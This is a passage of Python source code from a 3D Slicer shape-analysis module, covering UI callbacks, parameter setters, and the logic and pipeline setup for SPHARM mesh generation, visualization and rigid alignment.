self.Logic.parameters.setUseRegTemplate(self.useRegTemplate.checkState())
# Enable/Disable the registration template path in the UI
self.label_regTemplate.enabled = self.useRegTemplate.checkState()
self.regTemplate.enabled = self.useRegTemplate.checkState()
# Update of the registration template path for the Parameters to SPHARM Mesh step
def onRegTemplateValueChanged(self):
self.Logic.parameters.setRegTemplate(self.regTemplate.currentPath)
def onEnableFlipTemplate(self):
# Update of the flip template boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setUseFlipTemplate(self.useFlipTemplate.checkState())
# Enable/Disable the flip template path in the UI
self.label_flipTemplate.enabled = self.useFlipTemplate.checkState()
self.flipTemplate.enabled = self.useFlipTemplate.checkState()
# Update of the flip template path for the Parameters to SPHARM Mesh step
def onFlipTemplateValueChanged(self):
self.Logic.parameters.setFlipTemplate(self.flipTemplate.currentPath)
# Update of the flip parameter for the Parameters to SPHARM Mesh step
def onChoiceOfFlipValueChanged(self):
self.Logic.parameters.setChoiceOfFlip(self.choiceOfFlip.currentIndex)
def onEnableFlipChoices(self):
# Update of the flip option boolean for the Parameters to SPHARM Mesh step
self.Logic.parameters.setSameFlipForAll(self.sameFlipForAll.checkState())
self.choiceOfFlip.enabled = self.sameFlipForAll.checkState()
self.tableWidget_ChoiceOfFlip.enabled = not self.sameFlipForAll.checkState()
if not self.sameFlipForAll.checkState():
self.fillTableForFlipOptions()
#
# Correspondence Improvement
#
def onFiducialsDirectoryChanged(self, directory):
self.Logic.parameters.setFiducialsDirectory(directory)
def onEnableRigidAlignment(self, enabled):
self.Logic.parameters.setRigidAlignmentEnabled(enabled)
#
# Apply CLIs
#
def onApplyButton(self):
# Run workflow
if not self.Logic.Node.IsBusy():
# Check the registration template file
if self.useRegTemplate.checkState():
if not os.path.exists(self.regTemplate.currentPath) or not self.regTemplate.currentPath.endswith(".vtk"):
slicer.util.errorDisplay("Invalid registration template file in Advanced Parameters to SPHARM Mesh Tab")
return
# Check the flip template file
if self.useFlipTemplate.checkState():
if not os.path.exists(self.flipTemplate.currentPath) or not self.flipTemplate.currentPath.endswith(".coef"):
slicer.util.errorDisplay("Invalid flip template file in Advanced Parameters to SPHARM Mesh Tab")
return
# Empty the output folders if the overwrite options are checked
self.Logic.cleanOutputFolders()
# Change the apply buttons
logging.info('Widget: Running ShapeAnalysisModule')
self.ApplyButton.setText("Cancel")
self.Logic.addObserver(self.Logic.Node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onLogicModified)
self.Logic.Node.SetStatus(self.Logic.Node.Scheduled)
self.Logic.allCaseStartTime = time.time()
self.Logic.ShapeAnalysisCases()
# Cancel Workflow
else:
logging.info("Widget: Cancelling ShapeAnalysisModule")
self.ApplyButton.setEnabled(False)
self.Logic.Cancel()
def onLogicModified(self, logic_node, event):
status = logic_node.GetStatusString()
logging.info('-- %s : ShapeAnalysisModule', status)
# if not busy (completed, error, cancelled)
if not logic_node.IsBusy():
self.Logic.removeObserver(logic_node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onLogicModified)
# Create Error Message
if status == 'Completed with errors' or status == 'Cancelled':
logging.error(self.Logic.ErrorMessage)
qt.QMessageBox.critical(slicer.util.mainWindow(),
'ShapeAnalysisModule',
self.Logic.ErrorMessage)
elif status == 'Completed':
self.Logic.improveCorrespondence()
self.configurationVisualization()
# Empty lists
self.Logic.pipeline = {}
self.Logic.completed = {}
# Change the apply buttons
self.ApplyButton.setEnabled(True)
self.ApplyButton.setText("Run ShapeAnalysisModule")
# if running, create some progress bars for each cases
elif status == 'Running':
self.Logic.ProgressBar.show()
if self.progressbars_layout:
self.CLIProgressBars.hide()
self.CLIProgressBars = ctk.ctkCollapsibleGroupBox()
self.CLIProgressBars.setTitle('Detail')
self.progress_layout.addWidget(self.CLIProgressBars)
self.progressbars_layout = qt.QVBoxLayout(self.CLIProgressBars)
for i in range(len(self.Logic.pipeline)):
self.progressbars_layout.addWidget(self.Logic.pipeline[i].ProgressBar)
# Function to update the checkable comboBox and the table's checkBoxes in the visualization tab according of the check of one checkBox in the checkable comboBox
def onCheckableComboBoxValueChanged(self):
currentText = self.CheckableComboBox_visualization.currentText
currentIndex = self.CheckableComboBox_visualization.currentIndex
currentItem = self.CheckableComboBox_visualization.model().item(currentIndex, 0)
# ******* Update the CheckableComboBox ******* #
# Check/Uncheck the "Case i: case_name [..]" checkboxes in the checkacle comboBox
if currentText == "All Models":
self.checkedItems("SPHARM", currentItem.checkState())
elif currentText == "All SPHARM Models":
self.checkedItems("SPHARM Models", currentItem.checkState())
elif currentText == "All SPHARM Ellipse Aligned Models":
self.checkedItems("SPHARM Ellipse Aligned Models", currentItem.checkState())
elif currentText == "All SPHARM Medial Meshes":
self.checkedItems("SPHARM Medial Meshes", currentItem.checkState())
elif currentText == "All SPHARM Procrustes Aligned Models":
self.checkedItems("SPHARM Procrustes Aligned Models", currentItem.checkState())
# Check/Uncheck the "All [..]" checkboxes in the checkacle comboBox
self.checkedAllItems()
self.CheckableComboBox_visualization.blockSignals(False)
# ******* Update the checkboxes in the table ******* #
for row in range(0, self.tableWidget_visualization.rowCount):
actionOnCheckBox = False
label = self.tableWidget_visualization.cellWidget(row, 0)
outputRootname = label.text
if currentText == "All Models":
actionOnCheckBox = True
elif currentText == "All SPHARM Models":
if not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Ellipse Aligned Models":
if not outputRootname.find("SPHARM_ellalign") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Medial Meshes":
if not outputRootname.find("SPHARMMedialMesh") == -1:
actionOnCheckBox = True
elif currentText == "All SPHARM Procrustes Aligned Models":
if not outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
else:
for inputFilename in self.Logic.InputCases:
inputRootname = inputFilename.split('/')[-1].split('.')[0]
if not currentText.find(inputRootname) == -1:
if not currentText.find("SPHARM Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Ellipse Aligned Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM_ellalign") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Medial Meshes") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARMMedialMesh") == -1:
actionOnCheckBox = True
elif not currentText.find("SPHARM Procrustes Aligned Models") == -1:
if not outputRootname.find(inputRootname) == -1 and not outputRootname.find("SPHARM_procalign") == -1:
actionOnCheckBox = True
# check/uncheck the checkBox at (row,1)
if actionOnCheckBox:
widget = self.tableWidget_visualization.cellWidget(row, 1)
tuple = widget.children()
checkBox = tuple[1]
checkBox.blockSignals(True)
item = self.CheckableComboBox_visualization.model().item(currentIndex, 0)
if item.checkState():
checkBox.setChecked(True)
else:
checkBox.setChecked(False)
checkBox.blockSignals(False)
# Function to update the checkboxes in the checkbable comboBox in the visualization tab according of the check of a checBox in the visualization tab
def onCheckBoxTableValueChanged(self):
self.CheckableComboBox_visualization.blockSignals(True)
list = self.CheckableComboBox_visualization.model()
table = self.tableWidget_visualization
allSPHARMMesdialMeshesIndex = self.CheckableComboBox_visualization.findText("All SPHARM Medial Meshes") # If == -1 "All SPHARM Medial Meshes" checkBox doesn't exist
allSPHARMProcrustesAlignedModelsIndex = self.CheckableComboBox_visualization.findText("All SPHARM Procrustes Aligned Models") # If == -1 "All SPHARM Procrustes Aligned Models" checkBox doesn't exist
for i in range(len(self.Logic.InputCases)):
allCaseSPHARMModelsChecked = True
allCaseSPHARMEllalignModelsChecked = True
allCaseSPHARMMedialMeshesChecked = True
allCaseSPHARMProcrustesAlignedModelsChecked = True
inputRootname = self.Logic.InputCases[i].split('/')[-1].split('.')[0]
for row in range(0,table.rowCount):
label = table.cellWidget(row, 0)
outputRootname = label.text
if not outputRootname.find(inputRootname) == -1:
widget = table.cellWidget(row, 1)
tuple = widget.children()
checkBox = tuple[1]
if not checkBox.checkState():
if not outputRootname.find("SPHARM") == -1 and outputRootname.find("SPHARM_ellalign") == -1 and outputRootname.find("SPHARMMedialMesh") == -1 and outputRootname.find("SPHARM_procalign") == -1:
allCaseSPHARMModelsChecked = False
if not outputRootname.find("SPHARM_ellalign") == -1:
allCaseSPHARMEllalignModelsChecked = False
if not allSPHARMMesdialMeshesIndex == -1:
if not outputRootname.find("SPHARMMedialMesh") == -1:
allCaseSPHARMMedialMeshesChecked = False
if not allSPHARMProcrustesAlignedModelsIndex == -1:
if not outputRootname.find("SPHARM_procalign") == -1:
allCaseSPHARMProcrustesAlignedModelsChecked = False
# Check/uncheck checbox case according of the checkbox in the table
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Models"
self.checkedCaseItem(text, allCaseSPHARMModelsChecked)
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Ellipse Aligned Models"
self.checkedCaseItem(text, allCaseSPHARMEllalignModelsChecked)
if not allSPHARMMesdialMeshesIndex == -1:
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Medial Meshes"
self.checkedCaseItem(text, allCaseSPHARMMedialMeshesChecked)
if not allSPHARMProcrustesAlignedModelsIndex == -1:
text = "Case " + str(i) + ": " + inputRootname + " - SPHARM Procrustes Aligned Models"
self.checkedCaseItem(text, allCaseSPHARMProcrustesAlignedModelsChecked)
# Check/Uncheck the "All [..]" checkboxes in the checkacle comboBox
self.checkedAllItems()
self.CheckableComboBox_visualization.blockSignals(False)
# Visualization of the SPHARM Mesh outputs in Shape Population Viewer
def onSPHARMMeshesVisualizationInSPV(self):
# Creation of a CSV file to load the vtk files in ShapePopulationViewer
filePathCSV = slicer.app.temporaryPath + '/' + 'PreviewForVisualizationInSPV.csv'
self.Logic.creationCSVFileForSPV(self.tableWidget_visualization, filePathCSV)
if isinstance(slicer.modules.shapepopulationviewer, slicer.qSlicerCLIModule):
# Creation of the parameters of SPV
parameters = {}
parameters["CSVFile"] = filePathCSV
# Launch SPV
slicer.cli.run(slicer.modules.shapepopulationviewer, None, parameters, wait_for_completion=True)
else:
# Load CSV and select modules
slicer.modules.shapepopulationviewer.widgetRepresentation().loadCSVFile(filePathCSV)
slicer.util.selectModule(slicer.modules.shapepopulationviewer)
# Deletion of the CSV files in the Slicer temporary directory
if os.path.exists(filePathCSV):
os.remove(filePathCSV)
# Function to fill the flip options table for all the SPHARM mesh outputs
# - Column 0: filename of the input files
# - Column 1: comboBox with the flip corresponding to the output file
def fillTableForFlipOptions(self):
table = self.tableWidget_ChoiceOfFlip
row = 0
for basename in self.Logic.InputCases:
table.setRowCount(row + 1)
# Column 0:
rootname = basename.split('/')[-1].split('.')[0]
labelVTKFile = qt.QLabel(rootname)
labelVTKFile.setAlignment(0x84)
table.setCellWidget(row, 0, labelVTKFile)
# Column 1:
widget = qt.QWidget()
layout = qt.QHBoxLayout(widget)
comboBox = qt.QComboBox()
comboBox.addItems(['No Flip',
'Flip Along Axis of x and y',
'Flip Along Axis of y and z',
'Flip Along Axis of x and z',
'Flip Along Axis of x',
'Flip Along Axis of y',
'Flip Along Axis of x, y and z',
'Flip Along Axis of z',
'All'])
comboBox.setCurrentIndex(self.choiceOfFlip.currentIndex)
layout.addWidget(comboBox)
layout.setAlignment(0x84)
layout.setContentsMargins(0, 0, 0, 0)
widget.setLayout(layout)
table.setCellWidget(row, 1, widget)
row = row + 1
# Function to configure the checkable comboBox and the table of the visualization tab
def configurationVisualization(self):
# Configuration of the checkable comboBox
checkableComboBox = self.CheckableComboBox_visualization
# clean the checkable comboBox
list = checkableComboBox.model()
list.clear()
# add items according of the SPHARM Mesh computed by ParaToSPHARMMesh
checkableComboBox.blockSignals(True)
checkableComboBox.addItem("All Models")
checkableComboBox.addItem("All SPHARM Models")
checkableComboBox.addItem("All SPHARM Ellipse Aligned Models")
if self.medialMesh.checkState():
checkableComboBox.addItem("All SPHARM Medial Meshes")
if self.useRegTemplate.checkState():
checkableComboBox.addItem("All SPHARM Procrustes Aligned Models")
# Fill the checkable comboBox
for i in range(len(self.Logic.InputCases)):
checkableComboBox.addItem("Case " + str(i) + ": " + self.Logic.InputCases[i].split('/')[-1].split('.')[0] + " - SPHARM Models")
checkableComboBox.addItem("Case " + str(i) + ": " + self.Logic.InputCases[i].split('/')[-1].split('.')[0] + " - SPHARM Ellipse Aligned Models")
if self.medialMesh.checkState():
checkableComboBox.addItem("Case " + str(i) + ": " + self.Logic.InputCases[i].split('/')[-1].split('.')[0] + " - SPHARM Medial Meshes")
if self.useRegTemplate.checkState():
checkableComboBox.addItem("Case " + str(i) + ": " + self.Logic.InputCases[i].split('/')[-1].split('.')[0] + " - SPHARM Procrustes Aligned Models")
checkableComboBox.blockSignals(False)
# Configuration of the table
# column 0: filename of the SPHARM Meshes generated by ParaToSPHARMMesh
# column 1: checkbox that allows to the user to select what output he wants to display in Shape Population Viewer
table = self.tableWidget_visualization
outputDirectory = self.GroupProjectOutputDirectory.directory
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh/"
row = 0
for filename in os.listdir(SPHARMMeshOutputDirectory):
if filename.endswith(".vtk") and not filename.endswith("_para.vtk") and not filename.endswith("SPHARMMedialAxis.vtk"):
table.setRowCount(row + 1)
# Column 0:
labelVTKFile = qt.QLabel(os.path.splitext(filename)[0])
labelVTKFile.setAlignment(0x84)
table.setCellWidget(row, 0, labelVTKFile)
# Column 1:
widget = qt.QWidget()
layout = qt.QHBoxLayout(widget)
checkBox = qt.QCheckBox()
layout.addWidget(checkBox)
layout.setAlignment(0x84)
layout.setContentsMargins(0, 0, 0, 0)
widget.setLayout(layout)
table.setCellWidget(row, 1, widget)
checkBox.connect('stateChanged(int)', self.onCheckBoxTableValueChanged)
row = row + 1
# Functions to update the checkable comboBox in the visualization tab
# Check/Uncheck checkBoxes with the label 'text'
def checkedItems(self, text, checkState):
list = self.CheckableComboBox_visualization.model()
for i in range(1, list.rowCount()):
item = list.item(i, 0)
if not item.text().find(text) == -1:
item.setCheckState(checkState)
# Check/Uncheck "All [..]" checkBoxes in the checkable comboBox
def checkedAllItems(self):
list = self.CheckableComboBox_visualization.model()
allIndex = self.CheckableComboBox_visualization.findText("All Models")
allItem = list.item(allIndex, 0)
allSPHARMIndex = self.CheckableComboBox_visualization.findText("All SPHARM Models")
allSPHARMItem = list.item(allSPHARMIndex, 0)
allSPHARMEllalignIndex = self.CheckableComboBox_visualization.findText("All SPHARM Ellipse Aligned Models")
allSPHARMEllalignItem = list.item(allSPHARMEllalignIndex, 0)
allSPHARMMesdialMeshesIndex = self.CheckableComboBox_visualization.findText("All SPHARM Medial Meshes")
if not allSPHARMMesdialMeshesIndex == -1:
allSPHARMMesdialMeshesItem = list.item(allSPHARMMesdialMeshesIndex, 0)
allSPHARMProcrustesAlignedModelsIndex = self.CheckableComboBox_visualization.findText("All SPHARM Procrustes Aligned Models")
if not allSPHARMProcrustesAlignedModelsIndex == -1:
allSPHARMProcrustesAlignedModelsItem = list.item(allSPHARMProcrustesAlignedModelsIndex, 0)
# Check/Uncheck "All SPHARM Models" checkBox
self.checkedAllItem("- SPHARM Models", allSPHARMItem)
# Check/Uncheck "All SPHARM Ellipse Aligned Models" checkBox
self.checkedAllItem("- SPHARM Ellipse Aligned Models", allSPHARMEllalignItem)
# Check/Uncheck "All SPHARM Medial Mesh" checkBox
if not allSPHARMMesdialMeshesIndex == -1:
self.checkedAllItem("- SPHARM Medial Meshes", allSPHARMMesdialMeshesItem)
# Check/Uncheck "All SPHARM Procrustes Aligned Models" checkBox
if not allSPHARMProcrustesAlignedModelsIndex == -1:
self.checkedAllItem("- SPHARM Procrustes Aligned Models", allSPHARMProcrustesAlignedModelsItem)
# Check/Uncheck "All Models" checkBox
if allSPHARMEllalignItem.checkState() and allSPHARMItem.checkState():
if allSPHARMMesdialMeshesIndex == -1 and allSPHARMProcrustesAlignedModelsIndex == -1:
allItem.setCheckState(qt.Qt.Checked)
return
elif not allSPHARMMesdialMeshesIndex == -1 and not allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMMesdialMeshesItem.checkState() and allSPHARMProcrustesAlignedModelsItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
elif not allSPHARMMesdialMeshesIndex == -1 and allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMMesdialMeshesItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
elif allSPHARMMesdialMeshesIndex == -1 and not allSPHARMProcrustesAlignedModelsIndex == -1:
if allSPHARMProcrustesAlignedModelsItem.checkState():
allItem.setCheckState(qt.Qt.Checked)
return
allItem.setCheckState(qt.Qt.Unchecked)
# Check/Uncheck "Case i: case_name - SPHARM [..]" checkBox in the checkable comboBox
def checkedCaseItem(self, text, doCheck):
list = self.CheckableComboBox_visualization.model()
item = list.findItems(text)[0]
if doCheck:
item.setCheckState(qt.Qt.Checked)
else:
item.setCheckState(qt.Qt.Unchecked)
# Check/Uncheck "All [..]" (except "All Models") checkBox in the checkable comboBox
def checkedAllItem(self, text, item):
if self.areAllCasesChecked(text):
item.setCheckState(qt.Qt.Checked)
else:
item.setCheckState(qt.Qt.Unchecked)
# Specify if all the "Case i: case_name - SPHARM [..]" checkBoxes of one type of Model are checked
def areAllCasesChecked(self, text):
list = self.CheckableComboBox_visualization.model()
isChecked = True
for i in range(3, list.rowCount()):
item = list.item(i, 0)
if not item.text().find(text) == -1:
if not item.checkState():
isChecked = False
return isChecked
def clearFlipOptionsTable(self):
table = self.tableWidget_ChoiceOfFlip
table.clear()
table.setColumnCount(2)
table.setHorizontalHeaderLabels([' Files ', ' Choice of Flip '])
table.setColumnWidth(0, 400)
horizontalHeader = table.horizontalHeader()
horizontalHeader.setStretchLastSection(False)
_setSectionResizeMode(horizontalHeader, 0, qt.QHeaderView.Stretch)
_setSectionResizeMode(horizontalHeader, 1, qt.QHeaderView.ResizeToContents)
table.verticalHeader().setVisible(False)
#
# ShapeAnalysisModuleParameters
#
class ShapeAnalysisModuleParameters(object):
def __init__(self):
#
self.waitForCompletion = False
# Group Project IO
self.inputDirectory = " "
self.outputDirectory = " "
self.debug = False
# Post Processed Segmentation
self.OverwriteSegPostProcess = False
self.RescaleSegPostProcess = True
self.sx = 0.5
self.sy = 0.5
self.sz = 0.5
self.labelNumber = 0
# Generate Mesh Parameters
self.OverwriteGenParaMesh = False
self.NumberofIterations = 1000
# Parameters to SPHARM Mesh
self.OverwriteParaToSPHARMMesh = False
self.SubdivLevelValue = 10
self.SPHARMDegreeValue = 15
self.thetaIterationValue = 100
self.phiIterationValue = 100
self.medialMesh = False
self.tableWidget_ChoiceOfFlip = None
# Advanced Post Processed Segmentation
self.GaussianFiltering = False
self.VarianceX = 10
self.VarianceY = 10
self.VarianceZ = 10
# Advanced Parameters to SPHARM Mesh
self.useRegTemplate = False
self.regTemplate = " "
self.useFlipTemplate = False
self.flipTemplate = " "
self.choiceOfFlip = 0
self.sameFlipForAll = True
# RigidAlignment Parameters
self.rigidAlignmentEnabled = False
self.fiducialsDirectory = " "
def setWaitForCompletion(self, bool):
self.waitForCompletion = bool
def setInputDirectory(self, path):
self.inputDirectory = path
def setOutputDirectory(self, path):
self.outputDirectory = path
def setDebug(self, bool):
self.debug = bool
def setOverwriteSegPostProcess(self, bool):
self.OverwriteSegPostProcess = bool
def setRescaleSegPostProcess(self, bool):
self.RescaleSegPostProcess = bool
def setSx(self, value):
self.sx = value
def setSy(self, value):
self.sy = value
def setSz(self, value):
self.sz = value
def setLabelNumber(self, value):
self.labelNumber = value
def setOverwriteGenParaMesh(self, bool):
self.OverwriteGenParaMesh = bool
def setNumberofIterations(self, value):
self.NumberofIterations = value
def setOverwriteParaToSPHARMMesh(self, bool):
self.OverwriteParaToSPHARMMesh = bool
def setSubdivLevelValue(self, value):
self.SubdivLevelValue = value
def setSPHARMDegreeValue(self, value):
self.SPHARMDegreeValue = value
def setThetaIterationValue(self, value):
self.thetaIterationValue = value
def setPhiIterationValue(self, value):
self.phiIterationValue = value
def setMedialMesh(self, bool):
self.medialMesh = bool
def setTableForChoiceOfFlip(self, table):
self.tableWidget_ChoiceOfFlip = table
def setGaussianFiltering(self, bool):
self.GaussianFiltering = bool
def setVarianceX(self, value):
self.VarianceX = value
def setVarianceY(self, value):
self.VarianceY = value
def setVarianceZ(self, value):
self.VarianceZ = value
def setUseRegTemplate(self, bool):
self.useRegTemplate = bool
def setRegTemplate(self, path):
self.regTemplate = path
def setUseFlipTemplate(self, bool):
self.useFlipTemplate = bool
def setFlipTemplate(self, path):
self.flipTemplate = path
def setChoiceOfFlip(self, value):
self.choiceOfFlip = value
def setSameFlipForAll(self, bool):
self.sameFlipForAll = bool
def setFiducialsDirectory(self, directory):
self.fiducialsDirectory = directory
def setRigidAlignmentEnabled(self, enabled):
self.rigidAlignmentEnabled = enabled
#
# ShapeAnalysisModuleLogic
#
class ShapeAnalysisModuleLogic(LogicMixin):
"""
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def __init__(self):
LogicMixin.__init__(self, "ShapeAnalysisModule")
self.parameters = ShapeAnalysisModuleParameters()
def ShapeAnalysisCases(self):
# No cases
if not len(self.InputCases) > 0:
inputDirectory = self.parameters.inputDirectory
self.ErrorMessage = "No cases found in " + inputDirectory
self.Node.SetStatus(self.Node.CompletedWithErrors)
return -1
# Create pipelines
else:
logging.info('%d case(s) found', len(self.InputCases))
# Init
for i in range(len(self.InputCases)):
self.completed[i] = False
self.pipeline[i] = ShapeAnalysisModulePipeline(i, self.InputCases[i], self.parameters)
self.addObserver(self.pipeline[i].Node, slicer.vtkMRMLCommandLineModuleNode().StatusModifiedEvent,
self.onPipelineModified)
# Logic ready
self.Node.SetStatus(self.Node.Running)
# Launch Workflow
self.startPipeline(0)
return 0
# Empty the output folders if the overwrite option is checked
def cleanOutputFolders(self):
outputDirectory = self.parameters.outputDirectory
if self.parameters.OverwriteSegPostProcess:
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
if os.path.exists(PostProcessOutputDirectory):
for filename in os.listdir(PostProcessOutputDirectory):
os.remove(os.path.join(PostProcessOutputDirectory, filename))
if self.parameters.OverwriteGenParaMesh:
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
if os.path.exists(GenParaMeshOutputDirectory):
for filename in os.listdir(GenParaMeshOutputDirectory):
os.remove(os.path.join(GenParaMeshOutputDirectory, filename))
if self.parameters.OverwriteParaToSPHARMMesh:
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
if os.path.exists(SPHARMMeshOutputDirectory):
for filename in os.listdir(SPHARMMeshOutputDirectory):
os.remove(os.path.join(SPHARMMeshOutputDirectory, filename))
# Function to create a CSV file containing all the SPHARM mesh output files
# that the user wants to display in ShapePopultaionViewer
def creationCSVFileForSPV(self, table, filepathCSV):
# Creation of a CSV file with a header 'VTK Files'
file = open(filepathCSV, 'w')
cw = csv.writer(file, delimiter=',')
cw.writerow(['VTK Files'])
# Add the filepath of the vtk file checked in the table
outputDirectory = self.parameters.outputDirectory
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh/"
# Add the path of the vtk files if the users selected it
for row in range(0, table.rowCount):
# check the checkBox
widget = table.cellWidget(row, 1)
tuple = widget.children()
checkBox = tuple[1]
if checkBox.isChecked():
# Recovery of the vtk filename
qlabel = table.cellWidget(row, 0)
vtkRootname = qlabel.text
VTKfilepath = SPHARMMeshOutputDirectory + vtkRootname + ".vtk"
if os.path.exists(VTKfilepath):
cw.writerow([VTKfilepath])
file.close()
# Function to conditionally invoke RigidAlignment module to improve correspondence
def improveCorrespondence(self):
if self.parameters.rigidAlignmentEnabled:
logging.info("Invoking RigidAlignment...")
fidsDir = Path(self.parameters.fiducialsDirectory)
outDir = Path(self.parameters.outputDirectory)
inDir = outDir / 'Step3_ParaToSPHARMMesh'
outModelsDir = outDir / 'Step4_Improvement' / 'models'
outSphereDir = outDir / 'Step4_Improvement' / 'sphere'
os.makedirs(outModelsDir, exist_ok=True)
os.makedirs(outSphereDir, exist_ok=True)
models = inDir.glob('*_pp_surf_SPHARM.vtk')
fiducials = fidsDir.glob('*_fid.fcsv')
unitSphere = next(inDir.glob('*_surf_para.vtk'))
logic = RigidAlignmentModuleLogic()
logic.run(
models=models,
fiducials=fiducials,
unitSphere=unitSphere,
outModelsDir=outModelsDir,
outSphereDir=outSphereDir,
)
else:
logging.info("RigidAlignment not enabled; Skipping.")
#
# ShapeAnalysisModulePipeline
#
class ShapeAnalysisModulePipeline(PipelineMixin):
def __init__(self, pipelineID, CaseInput, interface):
PipelineMixin.__init__(self, pipelineID, CaseInput, interface)
self.interface = interface
def setupSkipCLIs(self):
self.skip_meshToLabelMap = False
self.skip_segPostProcess = False
self.skip_genParaMesh = False
self.skip_paraToSPHARMMesh = False
outputDirectory = self.interface.outputDirectory
# Skip MeshToLabelMap?
if not self.inputExtension == "vtk" and not self.inputExtension == "vtp":
self.skip_meshToLabelMap = True
else:
MeshToLabelMapOutputDirectory = outputDirectory + "/Step0_MeshToLabelMap"
MeshToLabelMapOutputFilepath = MeshToLabelMapOutputDirectory + "/" + self.inputRootname + ".nrrd"
if os.path.exists(MeshToLabelMapOutputFilepath):
self.inputExtension = "nrrd"
self.skip_meshToLabelMap = True
# If MeshToLabelMap is not skipped, do not skip the next CLIs: SegPostProcess, GenParaMesh and ParaToSPHARMMesh
if self.skip_meshToLabelMap == False:
return
# Skip SegPostProcess ?
if not self.interface.OverwriteSegPostProcess:
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
PostProcessOutputFilepath = PostProcessOutputDirectory + "/" + self.inputRootname + "_pp.nrrd"
if os.path.exists(PostProcessOutputFilepath):
self.skip_segPostProcess = True
# If SegPostProcess is not skip, do not skip the next CLIs: GenParaMesh and ParaToSPHARMMesh
if self.skip_segPostProcess == False:
return
# Skip GenParaMesh ?
if not self.interface.OverwriteGenParaMesh:
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
ParaOutputFilepath = GenParaMeshOutputDirectory + "/" + self.inputRootname + "_pp_para.vtk"
SurfOutputFilepath = GenParaMeshOutputDirectory + "/" + self.inputRootname + "_pp_surf.vtk"
if os.path.exists(ParaOutputFilepath) and os.path.exists(SurfOutputFilepath):
self.skip_genParaMesh = True
# If GenParaMesh is not skipped, do not skip the next CLI: ParaToSPHARMMesh
if self.skip_genParaMesh == False:
return
# Skip ParaToSPHARMMesh ?
if not self.interface.OverwriteParaToSPHARMMesh:
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
SPHARMMeshRootname = self.inputRootname + "_pp_surf"
if os.path.exists(SPHARMMeshOutputDirectory):
for file in os.listdir(SPHARMMeshOutputDirectory):
if not file.find(SPHARMMeshRootname) == -1:
self.skip_paraToSPHARMMesh = True
def setup(self):
# Initialization of global variables
self.setupGlobalVariables()
self.setupSkipCLIs()
inputDirectory = self.interface.inputDirectory
outputDirectory = self.interface.outputDirectory
## Mesh To Label Map: Transform model in label map
cli_nodes = list() # list of the nodes used in the Mesh to Label Map step
cli_dirnames = list() # list of the directory pathes where the nodes used in the Mesh to Label Map step are stored
MeshToLabelMapOutputDirectory = outputDirectory + "/Step0_MeshToLabelMap"
MeshToLabelMapOutputFilename = self.inputRootname + ".nrrd"
MeshToLabelMapOutputFilepath = os.path.join(MeshToLabelMapOutputDirectory, MeshToLabelMapOutputFilename)
if not self.skip_meshToLabelMap:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
model_input_node = MRMLUtility.loadMRMLNode(self.inputRootname, inputDirectory, self.CaseInput, 'ModelFile')
cli_parameters["mesh"] = model_input_node
meshtolabelmap_output_node = MRMLUtility.createNewMRMLNode(self.inputRootname, slicer.vtkMRMLLabelMapVolumeNode())
cli_parameters["labelMap"] = meshtolabelmap_output_node
cli_parameters["spacingVec"] = "0.1,0.1,0.1"
self.inputExtension = "nrrd"
self.setupModule(slicer.modules.meshtolabelmap, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : LabelMap
if not os.path.exists(MeshToLabelMapOutputDirectory):
os.makedirs(MeshToLabelMapOutputDirectory)
cli_nodes.append(model_input_node)
cli_nodes.append(meshtolabelmap_output_node)
cli_dirnames.append(inputDirectory)
cli_dirnames.append(MeshToLabelMapOutputDirectory)
self.setupNode(0, cli_nodes, cli_dirnames, [False, True], [True, True])
else:
if os.path.exists(MeshToLabelMapOutputFilepath):
# Setup of the nodes which will be used by the next CLI
meshtolabelmap_output_node = MRMLUtility.loadMRMLNode(self.inputRootname, MeshToLabelMapOutputDirectory, MeshToLabelMapOutputFilename, 'LabelMap')
cli_nodes.append(meshtolabelmap_output_node)
cli_dirnames.append(MeshToLabelMapOutputDirectory)
self.setupNode(0, cli_nodes, cli_dirnames, [False], [True])
## Post Processed Segmentation
cli_nodes = list() # list of the nodes used in the Post Processed Segmentation step
cli_dirnames = list() # list of the directory pathes where the nodes used in the Post Processed Segmentation step are stored
PostProcessOutputDirectory = outputDirectory + "/Step1_SegPostProcess"
PostProcessOutputRootname = self.inputRootname + "_pp"
PostProcessOutputFilename = self.inputRootname + "_pp.nrrd"
if not self.skip_segPostProcess:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
